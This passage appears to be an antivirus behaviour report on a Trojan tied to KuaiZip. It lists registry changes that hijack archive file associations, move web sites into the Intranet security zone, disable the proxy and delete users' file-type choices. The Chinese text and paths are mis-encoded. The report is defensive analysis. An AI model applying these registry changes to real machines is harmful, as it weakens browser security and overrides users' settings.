"Seed" = "A1 D6 92 51 37 AA E4 B9 00 AE 2F D2 3A 2D F8 45"

[HKCR\KuaiZip.gzip\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.019\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\.jar]
"(Default)" = "KuaiZip.jar"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.082]
"set" = "1"

[HKCR\.tbz]
"(Default)" = "KuaiZip.tbz"

[HKCR\KuaiZip_FileAsso.Origin\.001]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.089]
"set" = "1"

[HKCR\KuaiZip.cab\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.091]
"(Default)" = "NoAssociate.KZ"

[HKCR\.070]
"(Default)" = "KuaiZip.070"

[HKCR\KuaiZip.010\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.tbz\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.041\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.048]
"(Default)" = "NoAssociate.KZ"

[HKCR\.030]
"(Default)" = "KuaiZip.030"

[HKCR\KuaiZip.031]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 031 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.043]
"(Default)" = "NoAssociate.KZ"

[HKCR\.006]
"(Default)" = "KuaiZip.006"

[HKCR\KuaiZip.047\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.054]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.005]
"(Default)" = "NoAssociate.KZ"

[HKCR\.098]
"(Default)" = "KuaiZip.098"

[HKCR\KuaiZip_FileAsso.Origin\.009]
"(Default)" = "NoAssociate.KZ"

[HKCR\.057]
"(Default)" = "KuaiZip.057"

[HKCR\KuaiZip.020]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 020 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.053]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 053 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.072]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 072 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.042\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip_FileAsso.Origin\.079]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.083\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.063]
"set" = "1"

[HKCR\KuaiZip.035\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.073\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.02]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 02 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.056\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.021\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.rar]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ RAR Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\.004]
"(Default)" = "KuaiZip.004"

[HKCR\KuaiZip_FileAsso.Origin\.017]
"(Default)" = "NoAssociate.KZ"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.060]
"set" = "1"

[HKCR\KuaiZip.063\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.075]
"set" = "1"

[HKCR\KuaiZip.009\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.017]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 017 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.003]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.028]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 028 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.067\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.tbz]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.04\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.097]
"set" = "1"

[HKCR\.077]
"(Default)" = "KuaiZip.077"

[HKCR\KuaiZip.006\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.02]
"(Default)" = "KuaiZip.02"

[HKCR\KuaiZip.065\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.083]
"(Default)" = "KuaiZip.083"

[HKCR\KuaiZip_FileAsso.Origin\.068]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.027\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\.016]
"(Default)" = "KuaiZip.016"

[HKCR\.087]
"(Default)" = "KuaiZip.087"

[HKCR\KuaiZip.087\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.085]
"set" = "1"

[HKCR\KuaiZip.041]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 041 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip_FileAsso.Origin\.065]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.010]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip.022\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip_FileAsso.Origin\.047]
"(Default)" = "NoAssociate.KZ"

[HKCR\KuaiZip_FileAsso.Origin\.lzh]
"(Default)" = "NoAssociate.KZ"

[HKCR\.024]
"(Default)" = "KuaiZip.024"

[HKCR\KuaiZip.043]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 043 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.002\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.004]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.bz2]
"set" = "1"

[HKCR\KuaiZip.054]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 054 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.079]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 079 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.090]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 090 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.02]
"set" = "1"

[HKCR\.kz]
"(Default)" = "KuaiZip.kz"

[HKCR\KuaiZip.060]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 060 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.084\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.094]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 094 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.055\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.057\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.022\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.lzh]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.018]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.020]
"set" = "1"

[HKCR\.gzip]
"(Default)" = "KuaiZip.gzip"

[HKCR\KuaiZip.002]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 002 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.018\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCR\KuaiZip.007]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 007 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.044]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.gz]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.016]
"set" = "1"

[HKCR\KuaiZip.033]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 033 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.046]
"set" = "1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.041]
"set" = "1"

[HKCR\KuaiZip.055\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.003]
"set" = "1"

[HKCR\KuaiZip.058]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 058 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCR\KuaiZip.088\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.087]
"(Default)" = "Ã¥Â¿Â«Ã¥Å½â€¹ 087 Ã¥Å½â€¹Ã§Â¼Â©Ã¦â€“â€¡Ã¤Â»Â¶"

[HKCU\Software\KuaiZip\KuaiZip\Setup\.05]
"set" = "1"

[HKCR\KuaiZip.040\DefaultIcon]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe,0"

[HKCR\KuaiZip.arj\shell\open\command]
"(Default)" = "%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe %1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.018]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.019]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.048\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.042\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.044\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.072\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.08]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.047\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gzip]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tbz\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.078\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.020\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.015]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.070\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.086]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.059]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.045]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.039]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jar]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.053]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.035\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.082]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mou]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.025\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tar]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.093\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.029\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.022]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.021]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.020]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.025]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.036]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.051\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.094]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.arj\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.081]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.033\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.066\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.09]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rpm\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.kz]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.064]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.009]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.053\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.jar\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.lzh\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.089\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.065]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.068]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wim\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.002]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.085\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.001\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.091]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.044]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.063\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.062\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.060\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.048]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.036\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.045\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.07]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.041]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.02\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.03\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.083\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.034]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.049\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.052]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rar\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.098\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.06]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.7z\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.006\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.03]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.08\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.06\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.gzip\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.043\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.01]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.056]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.019\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.071\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.096]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.069\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.049]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.056\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.043]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.011\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.096\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.z\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.012\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.097]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.091\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.074\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.05]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.076]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.008]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.082\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.014\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.090\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.050\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.016\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.029]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.bz2]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.01\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tgz]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.077]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.cab]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tar\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.092\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.097\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.079\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.006]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.088\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.035]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.059\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.058]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.095]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.040]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.083]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.038\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.069]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.068\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.080\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.057]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.027]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.054]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.055]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.012]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.058\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.004\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.tbz]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.008\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.057\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.071]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.07\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.099]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.064\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.040\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.04\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.075]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rpm]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.087\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.062]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.037]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.037\UserChoice]
"Progid"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.093]
"Progid"

